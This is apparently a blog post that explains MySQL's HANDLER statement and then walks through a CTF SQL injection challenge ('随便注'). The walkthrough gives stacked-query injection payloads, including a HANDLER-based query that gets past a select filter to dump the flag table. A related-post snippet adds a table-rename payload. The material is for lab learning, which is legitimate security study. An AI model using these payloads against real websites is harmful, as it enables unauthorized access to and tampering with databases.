MYSQL handler的用法与应用-[强网杯 2019]随便注

已于 2022-10-10 17:29:51 修改
阅读量1.1k 收藏 1
点赞数
文章标签: mysql 数据库 sql 网络安全 web安全
于 2022-10-10 17:25:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rainsghost/article/details/127246004
版权

目录

一、handler的用法

1.前提介绍:

2.命令介绍:

二、buuctf:[强网杯 2019]随便注

题目详解

1、前提侦测:

2、常规注入

3、得出结论

一、handler的用法

MYSQL官网介绍:https://dev.mysql.com/doc/refman/8.0/en/handler.html

1.前提介绍:

HANDLER 是一个比较低级的语句;

具有自己的会话机制,且会话对象不由其他会话共享,且直到会话调用 HANDLER... CLOSE 或会话终止时才关闭。(因此想要调用handler语句,必须用handler ... open 先开启handler会话).

HANDLER 语句提供了对表存储引擎接口的直接访问。

所有形式的 HANDLER... READ 默认获取一行(如果有的话)

2.命令介绍:

HANDLER tbl_name OPEN [ [AS] alias]
    handler tablename open;                              /开启tablename表
    hand tablename open as new_tablename;   /追加tablename的表的别名为new_tablename(需要注意的是,此处不是修改,且只在当前会话内生效)

HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,...) [ WHERE where_condition ] [LIMIT ... ]
    handler tablename read Keyname=('test001'); /读取tablename表的索引名为Keyname的值为test001的整行信息。(每张表都会默认有索引列)

HANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST } [ WHERE where_condition ] [LIMIT ... ]
     handler tablename read listname first;      /读取tablename表的列名为listname的第一个值的整行信息。

HANDLER tbl_name READ { FIRST | NEXT } [ WHERE where_condition ] [LIMIT ... ]
     handler tablename read first;                  /读取tablename表的第一行信息。
     handler tablename read next;                 /读取tablename表的下一行信息。
     handler tablename read first limit 0,2;    /读取tablename表的前两行信息。

HANDLER tbl_name CLOSE 

     handler tablename close                        /退出handler会话(它于handler ... open是相对的)

PS:

    handler的LIMIT语法与SELECT完全一致,所以,这里就不多做详解了。

    如果在 open 语句打开表时,用了 as 指向了一个别名,则对带有其他 HANDLER 语句的打开表的进一步引用必须使用别名而不是表名。  如果不使用别名,而是使用由数据库名称限定的表名称打开表,则进一步的引用必须使用未限定的表名称

     例如,现在已知一张表名为tablename:

handler tablename open;
handler tablename read frist;
handler tablename close;

或者:

handler  tablename open as test;
handler test read frist;
handler test close;

<<<<<<<<<<<<<<<<<<<<<<<<<<<<完毕>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

二、buuctf:[强网杯 2019]随便注

题目详解

url:BUUCTF在线评测

1、前提侦测:

打开首页:

页面代码看不出任何东西,我们点击一下提交,

 返回了一个数组,根据题目提示,和传参方式,我们可以试着用get注入

1' or 'a' = 'a

1'%20or%20'a'%20=%20'a

 

可以确定,是存在get注入漏洞的,

2、常规注入

那么我们就可以按照常规思路去试一下:

-1' union select 1,database()--+

-1%27%20union%20select%201,database()--+

报错了,而且过滤起来很严格。 万幸的是,它并没有过滤handler语句。

用handler语句代替select,这样就要换个方式了,因为两个语句的查询方式并不一致:

先看一下同目录下有多少张表:

1';show tables;--+

两张表 "1919810931114514" 和 "words"

表格式:

1';desc words;--+

-1'%20;desc%20`1919810931114514`;--+

 

3、得出结论

很明显的falg在 1919810931114514表内。

而且还能推出另外一点:words表有两列,分别是id和data。我们之前提交1' or 'a' = 'a获得的表信息很大可能就是该表的信息。1就应该是id的值。

下面就是验证:为了避免flag信息不在第一行,我们一次查看多一点:

-1';handler  `1919810931114514` open;handler `1919810931114514` read first limit 0,10;handler `1919810931114514` close;--+

沙凌.
关注
MYSQL handler用法
snowlyzz的博客
07-02 1089
MySQLMySQLhandler 堆叠
buuctf-web-[强网杯 2019]随便-wp
居上
06-22 1380
[强网杯 2019]随便 源码 (这题本身没有源码,源码是我从网上下载的便于学习) <html> <head> <meta charset="UTF-8"> <title>easy_sql</title> </head> <body> <h1>取材于某次真实环境渗透,只说一句话:开发和安全缺一不可</h1> <!-- sqlmap是没有灵魂的 --> <form
MySQLMySQLhandler 的详细使用及说明
边扯边淡
11-21 9315
起序:在 Web 题遇到的,也算是骚姿势吧,希望帮到有需要的同志。 一、简介 MySQL 除了可以使用 select 查询表中的数据,也可使用 handler 语句,这条语句使我们能够一行一行的浏览一个表中的数据,不过handler 语句并不具备 select 语句的所有功能。它是 MySQL 专用的语句,并没有包含到SQL标准中。handler 语句提供通往表的直接通道的存储引擎接口,可以用于 MyISAM 和 InnoDB 表。 二、语法 1、官方语法 官方给出的:HANDLER Statement
Android Handler详解
Working harder, getting stronger!
03-01 736
Android Handler详解
强网杯2019 随便
BlueDoorZz的博客
07-11 432
没什么好说的,教程一搜一大堆。 这题过滤了select,updata,where等关键字,不能使用常规的方法进行入,可以考虑堆叠入。 查表名:1';show tables;# 查列名:1';show cloumns from XXXX;# 查看flag有两种方式: 一 1';rename tables `words` to `words1`;rename tables `1919810931114514` to `words`; alter table `words` change `fla
MySQL HANDLER命令:一种独特的表数据访问方式
最新发布
weixin_65279640的博客
04-20 536
HANDLER命令是MySQL中的一种特殊命令,它允许用户在底层与表的存储引擎直接交互。通过HANDLER,你可以打开一个表,然后逐行读取数据,而不需要使用SELECT语句。这种底层的访问方式在某些场景下可以提供更高的性能,尤其是在需要批量处理大量数据的情况下。
MYSQL神秘的HANDLER命令与实现方法
01-19
MySQL“自古以来”都有一个神秘的HANDLER命令,而此命令非SQL标准语法,可以降低优化器对于SQL语句的解析与优化开销,从而提升查询性能。看到这里,可能有小伙伴不淡定了,这么好的东西为啥没广泛使用呢?这不是与几...
handler:用于graphl-go的Golang HTTP.Handler
05-01
graphql-go-handler 用于Golang HTTP.Handler 用法 package main import ( "net/http" "github.com/graphql-go/handler" ) func main () { schema , _ := graphql. NewSchema ( ... ) h := handler. New ( & ...
Using MySQL as a NoSQL
vanadiumlin
01-27 418
Using MySQL as a NoSQL Using, NoSQL, MySQL http://yoshinorimatsunobu.blogspot.com/2010/10/using-mysql-as-nosql-story-for.html 貌似作者是日本人。 YOSHINORI MATSUNOBU 翻译过来应该是 松信嘉範 2010年8月离开Oracle,加盟日本社交游...
MySQL关于HANDLER命令的说明
miaoyibo12的博客
03-20 636
文章目录一、 语法二、为什么要用HANDLER而不是“SELECT”语句 一、 语法 官方给出的格式: HANDLER tbl_name OPEN [ [AS] alias] HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,...) [ WHERE where_cond...
mysql handler 详解_MYSQL神秘的HANDLER命令与实现方法
weixin_35172689的博客
01-27 287
MySQL“自古以来”都有一个神秘的HANDLER命令,而此命令非SQL标准语法,可以降低优化器对于SQL语句的解析与优化开销,从而提升查询性能。看到这里,可能有小伙伴不淡定了,这么好的东西为啥没广泛使用呢?这不是与几年前很夯的handlersocket插件类似吗?那么,我们先来看看Handler语法说明:HANDLER tbl_name OPEN [ [AS] alias]HANDLER tbl...
mysql handler 使用_mysql8 参考手册--HANDLER语句
weixin_42131013的博客
01-19 223
HANDLER tbl_name OPEN [ [AS] alias]HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,...)[ WHERE where_condition ] [LIMIT ... ]HANDLER tbl_name READ index_name { FIRS...
浅谈MysQLHANDLER语法介绍及使用
11-18 291
 今天小编要和大家说的是handler用法,希望对大家有所帮助。HANDLER tbl_name OPEN [ AS alias ]HANDLER tbl_name READ index_name { = | >= |     [ WHERE where_condition ] [LIMIT ... ]HANDLER tbl_name READ index_name { FI
mysql handler 详解_MySQL神秘的HANDLER命令与实现
weixin_30623181的博客
01-27 809
MySQL“自古以来”都有一个神秘的HANDLER命令。使用此非SQL标准语法,可以降低优化器对于SQL语句的解析与优化开销,从而提升查询性能。看到这里,可能有小伙伴不淡定了,这么好的东西为啥没广泛使用呢?这不是与几年前很夯的handlersocket亦或是memcached plugin插件类似吗?那么,首先我们先来看看Handler命令的使用语法:HANDLER tbl_name OPEN [...
mysql handler操作
The Dawn.
10-27 155
[code="java"] HANDLER tbl_name OPEN [ [AS] alias] HANDLER tbl_name READ index_name { = | = | < | > } (value1,value2,...) [ WHERE where_condition ] [LIMIT ... ] HANDLER tbl_name READ index_na...
mysql handlers,2 Handlers
weixin_29480231的博客
03-17 137
在撰写stored routines时,MySQL提供一种很特别的宣告语法,你可以使用它宣告「handler」,handler用来处理stored routines中可能会发生的错误,让你可以针对发生的错误执行必要的补救工作,也可以防止stored routines因为发生错误而中止。首先要特别意宣告「handler」的位置: Handler是用来处理错误用的,所以在宣告的时候,要设定处理的错误...
MySQL 条件处理程序(Handler
weixin_44300779的博客
02-07 1001
条件处理程序 条件处理程序可以用来定义在流程控制结构中遇到问题时对应的处理步骤,语法为: DECLARE handler_action HANDLER FOR condition_value[,condition_value]... statement; #handler action continue:继续执行当前程序 exit:终止执行当前程序 #condition_value SQLSTATE sqlstate_value:状态码,如02000 SQLWARNING :所有
mysql handler 详解_Mysql参数详解_Handler
weixin_42474537的博客
01-27 242
Handler_read_first[656]——越高越好The number of times the first entry in an index was read. If this value is high, it suggests that the serveris doing a lot of full index scans; for example, SELECT col1 ...
详解PHP session_set_save_handler函数与MySQL应用
本文主要解析了PHP中`session_set_save_handler`函数的用法,特别是在MySQL数据库中的应用。`session_set_save_handler`是一个允许开发者自定义PHP session存储机制的关键函数,它允许用户在内存外(如数据库)管理...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值